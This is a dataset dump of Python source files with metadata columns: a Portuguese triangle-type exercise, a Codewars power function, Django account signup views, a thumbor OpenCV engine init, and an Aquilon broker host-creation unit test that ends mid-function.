elif m1 == m2 or m1 == m3 or m2 == m3:
n = 'ISÓSCELES'
print(f'De acordo com as medidas informadas, seu triângulo é {n}')
else:
n = 'ESCALENO'
print(f'De acordo com as medidas informadas, seu triângulo é {n}')
print('''
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Obrigado pelo uso!
--Desenvolvido por <NAME>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-''')
| es | 0.314868 | # Ex: 042 - Refaça o DESAFIO 035 dos triângulos, acrescentando o recurso de # mostrar que tipo de triângulo será formado: Equilátero - Todos os lados # iguais, Isósceles - Dois lados iguais, Escaleno - Todos os lados diferentes. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Seja bem-vindo!
--Exercício 042
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--Obrigado pelo uso!
--Desenvolvido por <NAME>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | 4.21184 | 4 |
Python/8/NthPower/nth_power.py | hwakabh/codewars | 0 | 6616842 | <reponame>hwakabh/codewars
import sys
def index(array, n):
if len(array) - 1 < n:
return -1
else:
return array[n] ** n
if __name__ == "__main__":
if len(sys.argv) == 1:
num = [int(i) for i in input('>>> Enter numbers to find N-th power with comma-separated: ').split(',')]
N = int(input('>>> Enter number for N: '))
print(index(array=num, n=N))
else:
sys.exit(1)
| import sys
def index(array, n):
if len(array) - 1 < n:
return -1
else:
return array[n] ** n
if __name__ == "__main__":
if len(sys.argv) == 1:
num = [int(i) for i in input('>>> Enter numbers to find N-th power with comma-separated: ').split(',')]
N = int(input('>>> Enter number for N: '))
print(index(array=num, n=N))
else:
sys.exit(1) | none | 1 | 3.909134 | 4 | |
accounts/views.py | Nuurek/HomeLibrary | 0 | 6616843 | from django.views.generic import TemplateView, FormView, RedirectView
from django.urls import reverse_lazy
from django.contrib.auth.models import User
from django.contrib.sites.shortcuts import get_current_site
from django.utils import timezone
from django.utils.crypto import get_random_string
from datetime import timedelta
from .forms import SignUpForm
from .models import UserProfile
from libraries.models import Library
class SignUpView(FormView):
template_name = 'accounts/signup.html'
form_class = SignUpForm
success_url = reverse_lazy('mail_sent')
def form_valid(self, form):
user: User = form.save(commit=False)
user.is_active = False
user.save()
user_profile = UserProfile(
user=user, confirmation_code=get_random_string(32), registration_time=timezone.now())
user_profile.save()
# noinspection PyBroadException
try:
domain = get_current_site(self.request)
user_profile.send_confirmation_code(domain=domain)
except Exception:
user.delete()
return super().form_valid(form)
class ConfirmationView(TemplateView):
template_name = 'accounts/confirmation.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
user_profile_id = kwargs['user_profile_id']
confirmation_code = kwargs['code']
user_profile = UserProfile.objects.get(id=user_profile_id)
if user_profile.confirmation_code == confirmation_code:
time_difference = timezone.now() - user_profile.registration_time
if time_difference < timedelta(hours=24):
user_profile.activate_user()
Library.objects.create(owner=user_profile).save()
context['success'] = True
context['username'] = user_profile.user.username
else:
user_profile.user.delete()
context['success'] = False
else:
context['success'] = False
return context
| from django.views.generic import TemplateView, FormView, RedirectView
from django.urls import reverse_lazy
from django.contrib.auth.models import User
from django.contrib.sites.shortcuts import get_current_site
from django.utils import timezone
from django.utils.crypto import get_random_string
from datetime import timedelta
from .forms import SignUpForm
from .models import UserProfile
from libraries.models import Library
class SignUpView(FormView):
template_name = 'accounts/signup.html'
form_class = SignUpForm
success_url = reverse_lazy('mail_sent')
def form_valid(self, form):
user: User = form.save(commit=False)
user.is_active = False
user.save()
user_profile = UserProfile(
user=user, confirmation_code=get_random_string(32), registration_time=timezone.now())
user_profile.save()
# noinspection PyBroadException
try:
domain = get_current_site(self.request)
user_profile.send_confirmation_code(domain=domain)
except Exception:
user.delete()
return super().form_valid(form)
class ConfirmationView(TemplateView):
template_name = 'accounts/confirmation.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
user_profile_id = kwargs['user_profile_id']
confirmation_code = kwargs['code']
user_profile = UserProfile.objects.get(id=user_profile_id)
if user_profile.confirmation_code == confirmation_code:
time_difference = timezone.now() - user_profile.registration_time
if time_difference < timedelta(hours=24):
user_profile.activate_user()
Library.objects.create(owner=user_profile).save()
context['success'] = True
context['username'] = user_profile.user.username
else:
user_profile.user.delete()
context['success'] = False
else:
context['success'] = False
return context
| fr | 0.140698 | # noinspection PyBroadException | 2.11064 | 2 |
opencv_engine/__init__.py | henriquesobral/opencv-engine | 0 | 6616844 | <filename>opencv_engine/__init__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pkg_resources import get_distribution, DistributionNotFound
__project__ = 'opencv_engine'
__version__ = None # required for initial installation
try:
__version__ = get_distribution(__project__).version
except DistributionNotFound:
VERSION = __project__ + '-' + '(local)'
else:
VERSION = __project__ + '-' + __version__
import logging
from pexif import ExifSegment
from thumbor.engines import BaseEngine
logger = logging.getLogger(__name__)
try:
from opencv_engine.engine_cv3 import Engine # NOQA
except ImportError:
logging.exception('Could not import opencv_engine. Probably due to setup.py installing it.')
def _patch_mime_types():
# need to monkey patch the BaseEngine.get_mimetype function to handle tiffs
# has to be patched this way b/c called as both a classmethod and instance method internally in thumbor
old_mime = BaseEngine.get_mimetype
def new_mime(buffer):
''' determine the mime type from the raw image data
Args:
buffer - raw image data
Returns:
mime - mime type of image
'''
mime = old_mime(buffer)
# tif files start with 'II'
if not mime and buffer.startswith('II'):
mime = 'image/tiff'
return mime
BaseEngine.get_mimetype = staticmethod(new_mime)
def _patch_exif():
def _get_exif_segment(self):
""" Override because the superclass doesn't check for no exif.
"""
segment = None
try:
if getattr(self, 'exif', None) is not None:
segment = ExifSegment(None, None, self.exif, 'ro')
except Exception:
logger.warning('Ignored error handling exif for reorientation', exc_info=True)
return segment
BaseEngine._get_exif_segment = _get_exif_segment
_patch_exif()
_patch_mime_types()
| <filename>opencv_engine/__init__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pkg_resources import get_distribution, DistributionNotFound
__project__ = 'opencv_engine'
__version__ = None # required for initial installation
try:
__version__ = get_distribution(__project__).version
except DistributionNotFound:
VERSION = __project__ + '-' + '(local)'
else:
VERSION = __project__ + '-' + __version__
import logging
from pexif import ExifSegment
from thumbor.engines import BaseEngine
logger = logging.getLogger(__name__)
try:
from opencv_engine.engine_cv3 import Engine # NOQA
except ImportError:
logging.exception('Could not import opencv_engine. Probably due to setup.py installing it.')
def _patch_mime_types():
# need to monkey patch the BaseEngine.get_mimetype function to handle tiffs
# has to be patched this way b/c called as both a classmethod and instance method internally in thumbor
old_mime = BaseEngine.get_mimetype
def new_mime(buffer):
''' determine the mime type from the raw image data
Args:
buffer - raw image data
Returns:
mime - mime type of image
'''
mime = old_mime(buffer)
# tif files start with 'II'
if not mime and buffer.startswith('II'):
mime = 'image/tiff'
return mime
BaseEngine.get_mimetype = staticmethod(new_mime)
def _patch_exif():
def _get_exif_segment(self):
""" Override because the superclass doesn't check for no exif.
"""
segment = None
try:
if getattr(self, 'exif', None) is not None:
segment = ExifSegment(None, None, self.exif, 'ro')
except Exception:
logger.warning('Ignored error handling exif for reorientation', exc_info=True)
return segment
BaseEngine._get_exif_segment = _get_exif_segment
_patch_exif()
_patch_mime_types()
| en | 0.838532 | #!/usr/bin/env python # -*- coding: utf-8 -*- # required for initial installation # NOQA # need to monkey patch the BaseEngine.get_mimetype function to handle tiffs # has to be patched this way b/c called as both a classmethod and instance method internally in thumbor determine the mime type from the raw image data Args: buffer - raw image data Returns: mime - mime type of image # tif files start with 'II' Override because the superclass doesn't check for no exif. | 2.079558 | 2 |
tests/broker/test_add_aquilon_host.py | ned21/aquilon | 7 | 6616845 | #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the add host command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from eventstest import EventsTestMixin
from brokertest import TestBrokerCommand
from dnstest import inaddr_ptr
# TODO: this file should be merged into test_add_host.py
class TestAddAquilonHost(EventsTestMixin, TestBrokerCommand):
def test_100_add_unittest00(self):
ip = self.net["unknown0"].usable[2]
self.dsdb_expect_add("unittest00.one-nyp.ms.com", ip, "eth0", ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest00.one-nyp.ms.com", "--ip", ip,
"--machine", "ut3c1n3", "--domain", "unittest",
"--personality", "inventory", "--buildstatus", "blind"])
self.dsdb_verify()
def test_105_show_unittest00(self):
command = "show host --hostname unittest00.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out,
"Primary Name: unittest00.one-nyp.ms.com [%s]" %
self.net["unknown0"].usable[2],
command)
self.matchoutput(out, "Machine: ut3c1n3", command)
self.matchoutput(out, "Model Type: blade", command)
self.matchoutput(out, "Archetype: aquilon", command)
self.matchoutput(out, "Personality: inventory", command)
self.matchoutput(out, "Domain: unittest", command)
self.matchoutput(out, "Build Status: blind", command)
self.matchoutput(out, "Advertise Status: False", command)
self.matchoutput(out, "Build Status: blind", command)
def test_105_show_unittest00_proto(self):
command = ["show", "host", "--hostname=unittest00.one-nyp.ms.com",
"--format=proto"]
host = self.protobuftest(command, expect=1)[0]
self.assertEqual(host.hostname, 'unittest00')
self.assertEqual(host.personality.name, 'inventory')
self.assertEqual(host.personality.archetype.name, 'aquilon')
self.assertEqual(host.fqdn, 'unittest00.one-nyp.ms.com')
self.assertEqual(host.mac, self.net["unknown0"].usable[2].mac)
self.assertEqual(host.ip, str(self.net["unknown0"].usable[2]))
self.assertEqual(host.archetype.name, 'aquilon')
self.assertEqual(host.dns_domain, 'one-nyp.ms.com')
self.assertEqual(host.domain.name, 'unittest')
self.assertEqual(host.domain.type, host.domain.DOMAIN)
self.assertEqual(host.sandbox_author, "")
self.assertEqual(host.status, 'blind')
self.assertEqual(host.machine.name, 'ut3c1n3')
self.assertEqual(host.sysloc, 'ut.ny.na')
self.assertEqual(host.type, 'host')
self.assertEqual(len(host.resources), 0)
self.assertEqual(len(host.services_used), 0)
self.assertEqual(len(host.services_provided), 0)
self.assertEqual(host.operating_system.archetype.name, 'aquilon')
self.assertEqual(host.operating_system.name,
self.config.get("archetype_aquilon",
"default_osname"))
self.assertEqual(host.operating_system.version,
self.config.get("archetype_aquilon",
"default_osversion"))
self.assertEqual(host.cluster, "")
def test_110_add_unittest12(self):
ip = self.net["unknown0"].usable[7]
self.dsdb_expect_add("unittest12.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest12.aqd-unittest.ms.com",
"--ip", ip, "--buildstatus", "blind",
"--machine", "ut3s01p1", "--domain", "unittest"])
self.dsdb_verify()
def test_115_show_unittest12(self):
command = "show host --hostname unittest12.aqd-unittest.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out,
"Primary Name: unittest12.aqd-unittest.ms.com [%s]" %
self.net["unknown0"].usable[7],
command)
self.matchoutput(out, "Machine: ut3s01p1", command)
self.matchoutput(out, "Model Type: rackmount", command)
self.matchoutput(out, "Archetype: aquilon", command)
self.matchoutput(out, "Personality: inventory", command)
self.matchoutput(out, "Domain: unittest", command)
self.matchoutput(out, "Build Status: blind", command)
def test_130_add_unittest20_bad_iface(self):
ip = self.net["zebra_vip"].usable[2]
command = ["add", "host", "--archetype", "aquilon",
"--hostname", "unittest20.aqd-unittest.ms.com",
"--ip", ip, "--zebra_interfaces", "eth0,eth2",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"]
out = self.badrequesttest(command)
self.matchoutput(out, "Machine unittest20.aqd-unittest.ms.com does not "
"have an interface named eth2.", command)
def test_130_add_unittest20_no_iface(self):
ip = self.net["zebra_vip"].usable[2]
command = ["add", "host", "--archetype", "aquilon",
"--hostname", "unittest20.aqd-unittest.ms.com",
"--ip", ip, "--zebra_interfaces", ",",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"]
out = self.badrequesttest(command)
self.matchoutput(out, "The interface list cannot be empty.", command)
def test_131_add_unittest20_e1(self):
# Add the transit before the host to verify that the reverse DNS entry
# will get fixed up
ip = self.net["zebra_eth1"].usable[0]
fqdn = "unittest20-e1.aqd-unittest.ms.com"
self.dsdb_expect_delete(ip)
self.dsdb_expect_add(fqdn, ip, "eth1", ip.mac)
command = ["add", "interface", "address", "--machine", "ut3c5n2",
"--interface", "eth1", "--fqdn", fqdn]
self.noouttest(command)
self.dsdb_verify()
def test_132_add_unittest20_good(self):
ip = self.net["zebra_vip"].usable[2]
eth1_ip = self.net["zebra_eth1"].usable[0]
fqdn = 'unittest20.aqd-unittest.ms.com'
eth1_fqdn = 'unittest20-e1.aqd-unittest.ms.com'
self.event_add_dns(
fqdn=[
fqdn,
inaddr_ptr(ip),
],
dns_environment='internal',
dns_records=[
[
{
'target': str(ip),
'rrtype': 'A',
},
],
[
{
'target': fqdn,
'rrtype': 'PTR',
},
],
],
)
self.event_upd_dns(
fqdn=[
eth1_fqdn,
inaddr_ptr(eth1_ip),
],
dns_environment='internal',
dns_records=[
[
{
'target': str(eth1_ip),
'rrtype': 'A',
},
],
[
{
'target': fqdn,
'rrtype': 'PTR',
},
],
],
)
self.dsdb_expect_add(fqdn, ip, "vip")
self.dsdb_expect_delete(eth1_ip)
self.dsdb_expect_add(eth1_fqdn, eth1_ip, "eth1",
eth1_ip.mac, primary=fqdn)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", fqdn,
"--ip", ip, "--zebra_interfaces", "eth0,eth1",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
self.events_verify()
def test_135_show_unittest20(self):
ip = self.net["zebra_vip"].usable[2]
eth0_ip = self.net["zebra_eth0"].usable[0]
eth1_ip = self.net["zebra_eth1"].usable[0]
command = ["show", "host", "--hostname",
"unittest20.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.searchoutput(out, r"Interface: eth0 %s \[boot, default_route\]" %
eth0_ip.mac, command)
self.searchoutput(out, r"Interface: eth1 %s \[default_route\]" %
eth1_ip.mac, command)
self.searchoutput(out,
r"Service Address: hostname\s*"
r"Address: unittest20.aqd-unittest.ms.com \[%s\]\s*"
r"Interfaces: eth0, eth1" % ip,
command)
self.matchoutput(out,
"Provides: unittest20-e1.aqd-unittest.ms.com [%s]" % eth1_ip,
command)
def test_135_show_unittest20_proto(self):
ip = self.net["zebra_vip"].usable[2]
eth0_ip = self.net["zebra_eth0"].usable[0]
eth1_ip = self.net["zebra_eth1"].usable[0]
command = ["show", "host", "--hostname",
"unittest20.aqd-unittest.ms.com", "--format", "proto"]
host = self.protobuftest(command, expect=1)[0]
found = False
for resource in host.resources:
if resource.name == "hostname" and resource.type == "service_address":
found = True
self.assertEqual(resource.service_address.ip, str(ip))
self.assertEqual(resource.service_address.fqdn,
"unittest20.aqd-unittest.ms.com")
ifaces = ",".join(sorted(resource.service_address.interfaces))
self.assertEqual(ifaces, "eth0,eth1")
self.assertTrue(found,
"Service address hostname not found in the resources. "
"Existing resources: %s" %
", ".join("%s %s" % (res.type, res.name)
for res in host.resources))
def test_135_verify_unittest20_service(self):
ip = self.net["zebra_vip"].usable[2]
command = ["show", "service", "address", "--name", "hostname",
"--hostname", "unittest20.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "Service Address: hostname", command)
self.matchoutput(out, "Bound to: Host unittest20.aqd-unittest.ms.com",
command)
self.matchoutput(out, "Address: unittest20.aqd-unittest.ms.com [%s]" % ip,
command)
self.matchoutput(out, "Interfaces: eth0, eth1", command)
def test_135_verify_unittest20_e1(self):
command = ["show", "address",
"--fqdn", "unittest20-e1.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "DNS Record: unittest20-e1.aqd-unittest.ms.com",
command)
self.matchoutput(out, "IP: %s" % self.net["zebra_eth1"].usable[0],
command)
self.matchoutput(out, "Reverse PTR: unittest20.aqd-unittest.ms.com",
command)
def test_140_add_unittest21(self):
ip = self.net["zebra_eth0"].usable[1]
self.dsdb_expect_add("unittest21.aqd-unittest.ms.com", ip, "bond0")
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest21.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n3",
"--domain", "unittest",
"--personality", "compileserver",
"--grn", "grn:/ms/ei/aquilon/unittest"])
self.dsdb_verify()
def test_145_verify_unittest21_network(self):
net = self.net["zebra_eth0"]
ip = net.usable[1]
command = ["show", "network", "--ip", net.ip, "--hosts",
"--format", "proto"]
network = self.protobuftest(command, expect=1)[0]
seen = False
macs = [ip.mac] # , self.net["zebra_eth1"].usable[1].mac]
for host in network.hosts:
if host.ip != str(ip):
continue
seen = True
self.assertTrue(host.archetype.name == "aquilon",
"archetype is '%s' instead of aquilon" %
host.archetype.name)
self.assertTrue(host.mac in macs,
"MAC is '%s' instead of %r" %
(host.mac, macs))
macs.remove(host.mac)
self.assertTrue(seen, "%s is missing from network protobuf output" % ip)
def test_150_add_unittest22(self):
ip = self.net["zebra_eth0"].usable[2]
self.dsdb_expect_add("unittest22.aqd-unittest.ms.com", ip, "br0")
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest22.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n4",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_155_verify_unittest22_network(self):
net = self.net["zebra_eth0"]
ip = net.usable[2]
command = ["show", "network", "--ip", net.ip, "--hosts",
"--format", "proto"]
network = self.protobuftest(command, expect=1)[0]
seen = False
macs = [ip.mac] # , self.net["zebra_eth1"].usable[2].mac]
for host in network.hosts:
if host.ip != str(ip):
continue
seen = True
self.assertTrue(host.archetype.name == "aquilon",
"archetype is '%s' instead of aquilon" %
host.archetype.name)
self.assertTrue(host.mac in macs,
"MAC is '%s' instead of %r" %
(host.mac, macs))
macs.remove(host.mac)
self.assertTrue(seen, "%s is missing from network protobuf output" % ip)
def test_160_add_unittest23(self):
ip = self.net["vpls"].usable[1]
self.dsdb_expect_add("unittest23.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest23.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n5",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_161_add_unittest24(self):
ip = self.net["vpls"].usable[2]
self.dsdb_expect_add("unittest24.one-nyp.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest24.one-nyp.ms.com",
"--ip", ip, "--machine", "np3c5n5",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_162_add_unittest25(self):
ip = self.net["unknown0"].usable[20]
self.dsdb_expect_add("unittest25.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest25.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n7",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
def test_163_add_unittest26(self):
ip = self.net["unknown0"].usable[23]
self.dsdb_expect_add("unittest26.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest26.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n8",
"--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestAddAquilonHost)
unittest.TextTestRunner(verbosity=2).run(suite)
| #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the add host command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from eventstest import EventsTestMixin
from brokertest import TestBrokerCommand
from dnstest import inaddr_ptr
# TODO: this file should be merged into test_add_host.py
class TestAddAquilonHost(EventsTestMixin, TestBrokerCommand):
def test_100_add_unittest00(self):
ip = self.net["unknown0"].usable[2]
self.dsdb_expect_add("unittest00.one-nyp.ms.com", ip, "eth0", ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest00.one-nyp.ms.com", "--ip", ip,
"--machine", "ut3c1n3", "--domain", "unittest",
"--personality", "inventory", "--buildstatus", "blind"])
self.dsdb_verify()
def test_105_show_unittest00(self):
command = "show host --hostname unittest00.one-nyp.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out,
"Primary Name: unittest00.one-nyp.ms.com [%s]" %
self.net["unknown0"].usable[2],
command)
self.matchoutput(out, "Machine: ut3c1n3", command)
self.matchoutput(out, "Model Type: blade", command)
self.matchoutput(out, "Archetype: aquilon", command)
self.matchoutput(out, "Personality: inventory", command)
self.matchoutput(out, "Domain: unittest", command)
self.matchoutput(out, "Build Status: blind", command)
self.matchoutput(out, "Advertise Status: False", command)
self.matchoutput(out, "Build Status: blind", command)
def test_105_show_unittest00_proto(self):
command = ["show", "host", "--hostname=unittest00.one-nyp.ms.com",
"--format=proto"]
host = self.protobuftest(command, expect=1)[0]
self.assertEqual(host.hostname, 'unittest00')
self.assertEqual(host.personality.name, 'inventory')
self.assertEqual(host.personality.archetype.name, 'aquilon')
self.assertEqual(host.fqdn, 'unittest00.one-nyp.ms.com')
self.assertEqual(host.mac, self.net["unknown0"].usable[2].mac)
self.assertEqual(host.ip, str(self.net["unknown0"].usable[2]))
self.assertEqual(host.archetype.name, 'aquilon')
self.assertEqual(host.dns_domain, 'one-nyp.ms.com')
self.assertEqual(host.domain.name, 'unittest')
self.assertEqual(host.domain.type, host.domain.DOMAIN)
self.assertEqual(host.sandbox_author, "")
self.assertEqual(host.status, 'blind')
self.assertEqual(host.machine.name, 'ut3c1n3')
self.assertEqual(host.sysloc, 'ut.ny.na')
self.assertEqual(host.type, 'host')
self.assertEqual(len(host.resources), 0)
self.assertEqual(len(host.services_used), 0)
self.assertEqual(len(host.services_provided), 0)
self.assertEqual(host.operating_system.archetype.name, 'aquilon')
self.assertEqual(host.operating_system.name,
self.config.get("archetype_aquilon",
"default_osname"))
self.assertEqual(host.operating_system.version,
self.config.get("archetype_aquilon",
"default_osversion"))
self.assertEqual(host.cluster, "")
def test_110_add_unittest12(self):
ip = self.net["unknown0"].usable[7]
self.dsdb_expect_add("unittest12.aqd-unittest.ms.com", ip, "eth0",
ip.mac)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest12.aqd-unittest.ms.com",
"--ip", ip, "--buildstatus", "blind",
"--machine", "ut3s01p1", "--domain", "unittest"])
self.dsdb_verify()
def test_115_show_unittest12(self):
command = "show host --hostname unittest12.aqd-unittest.ms.com"
out = self.commandtest(command.split(" "))
self.matchoutput(out,
"Primary Name: unittest12.aqd-unittest.ms.com [%s]" %
self.net["unknown0"].usable[7],
command)
self.matchoutput(out, "Machine: ut3s01p1", command)
self.matchoutput(out, "Model Type: rackmount", command)
self.matchoutput(out, "Archetype: aquilon", command)
self.matchoutput(out, "Personality: inventory", command)
self.matchoutput(out, "Domain: unittest", command)
self.matchoutput(out, "Build Status: blind", command)
def test_130_add_unittest20_bad_iface(self):
ip = self.net["zebra_vip"].usable[2]
command = ["add", "host", "--archetype", "aquilon",
"--hostname", "unittest20.aqd-unittest.ms.com",
"--ip", ip, "--zebra_interfaces", "eth0,eth2",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"]
out = self.badrequesttest(command)
self.matchoutput(out, "Machine unittest20.aqd-unittest.ms.com does not "
"have an interface named eth2.", command)
def test_130_add_unittest20_no_iface(self):
ip = self.net["zebra_vip"].usable[2]
command = ["add", "host", "--archetype", "aquilon",
"--hostname", "unittest20.aqd-unittest.ms.com",
"--ip", ip, "--zebra_interfaces", ",",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"]
out = self.badrequesttest(command)
self.matchoutput(out, "The interface list cannot be empty.", command)
def test_131_add_unittest20_e1(self):
# Add the transit before the host to verify that the reverse DNS entry
# will get fixed up
ip = self.net["zebra_eth1"].usable[0]
fqdn = "unittest20-e1.aqd-unittest.ms.com"
self.dsdb_expect_delete(ip)
self.dsdb_expect_add(fqdn, ip, "eth1", ip.mac)
command = ["add", "interface", "address", "--machine", "ut3c5n2",
"--interface", "eth1", "--fqdn", fqdn]
self.noouttest(command)
self.dsdb_verify()
def test_132_add_unittest20_good(self):
ip = self.net["zebra_vip"].usable[2]
eth1_ip = self.net["zebra_eth1"].usable[0]
fqdn = 'unittest20.aqd-unittest.ms.com'
eth1_fqdn = 'unittest20-e1.aqd-unittest.ms.com'
self.event_add_dns(
fqdn=[
fqdn,
inaddr_ptr(ip),
],
dns_environment='internal',
dns_records=[
[
{
'target': str(ip),
'rrtype': 'A',
},
],
[
{
'target': fqdn,
'rrtype': 'PTR',
},
],
],
)
self.event_upd_dns(
fqdn=[
eth1_fqdn,
inaddr_ptr(eth1_ip),
],
dns_environment='internal',
dns_records=[
[
{
'target': str(eth1_ip),
'rrtype': 'A',
},
],
[
{
'target': fqdn,
'rrtype': 'PTR',
},
],
],
)
self.dsdb_expect_add(fqdn, ip, "vip")
self.dsdb_expect_delete(eth1_ip)
self.dsdb_expect_add(eth1_fqdn, eth1_ip, "eth1",
eth1_ip.mac, primary=fqdn)
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", fqdn,
"--ip", ip, "--zebra_interfaces", "eth0,eth1",
"--machine", "ut3c5n2", "--domain", "unittest",
"--personality", "compileserver"])
self.dsdb_verify()
self.events_verify()
def test_135_show_unittest20(self):
ip = self.net["zebra_vip"].usable[2]
eth0_ip = self.net["zebra_eth0"].usable[0]
eth1_ip = self.net["zebra_eth1"].usable[0]
command = ["show", "host", "--hostname",
"unittest20.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.searchoutput(out, r"Interface: eth0 %s \[boot, default_route\]" %
eth0_ip.mac, command)
self.searchoutput(out, r"Interface: eth1 %s \[default_route\]" %
eth1_ip.mac, command)
self.searchoutput(out,
r"Service Address: hostname\s*"
r"Address: unittest20.aqd-unittest.ms.com \[%s\]\s*"
r"Interfaces: eth0, eth1" % ip,
command)
self.matchoutput(out,
"Provides: unittest20-e1.aqd-unittest.ms.com [%s]" % eth1_ip,
command)
def test_135_show_unittest20_proto(self):
ip = self.net["zebra_vip"].usable[2]
eth0_ip = self.net["zebra_eth0"].usable[0]
eth1_ip = self.net["zebra_eth1"].usable[0]
command = ["show", "host", "--hostname",
"unittest20.aqd-unittest.ms.com", "--format", "proto"]
host = self.protobuftest(command, expect=1)[0]
found = False
for resource in host.resources:
if resource.name == "hostname" and resource.type == "service_address":
found = True
self.assertEqual(resource.service_address.ip, str(ip))
self.assertEqual(resource.service_address.fqdn,
"unittest20.aqd-unittest.ms.com")
ifaces = ",".join(sorted(resource.service_address.interfaces))
self.assertEqual(ifaces, "eth0,eth1")
self.assertTrue(found,
"Service address hostname not found in the resources. "
"Existing resources: %s" %
", ".join("%s %s" % (res.type, res.name)
for res in host.resources))
def test_135_verify_unittest20_service(self):
ip = self.net["zebra_vip"].usable[2]
command = ["show", "service", "address", "--name", "hostname",
"--hostname", "unittest20.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "Service Address: hostname", command)
self.matchoutput(out, "Bound to: Host unittest20.aqd-unittest.ms.com",
command)
self.matchoutput(out, "Address: unittest20.aqd-unittest.ms.com [%s]" % ip,
command)
self.matchoutput(out, "Interfaces: eth0, eth1", command)
def test_135_verify_unittest20_e1(self):
command = ["show", "address",
"--fqdn", "unittest20-e1.aqd-unittest.ms.com"]
out = self.commandtest(command)
self.matchoutput(out, "DNS Record: unittest20-e1.aqd-unittest.ms.com",
command)
self.matchoutput(out, "IP: %s" % self.net["zebra_eth1"].usable[0],
command)
self.matchoutput(out, "Reverse PTR: unittest20.aqd-unittest.ms.com",
command)
def test_140_add_unittest21(self):
ip = self.net["zebra_eth0"].usable[1]
self.dsdb_expect_add("unittest21.aqd-unittest.ms.com", ip, "bond0")
self.noouttest(["add", "host", "--archetype", "aquilon",
"--hostname", "unittest21.aqd-unittest.ms.com",
"--ip", ip, "--machine", "ut3c5n3",
"--domain", "unittest",
"--personality", "compileserver",
"--grn", "grn:/ms/ei/aquilon/unittest"])
self.dsdb_verify()
def test_145_verify_unittest21_network(self):
net = self.net["zebra_eth0"]
ip = net.usable[1]
command = ["show", "network", "--ip", net.ip, "--hosts",
"--format", "proto"]
network = self.protobuftest(command, expect=1)[0]
seen = False
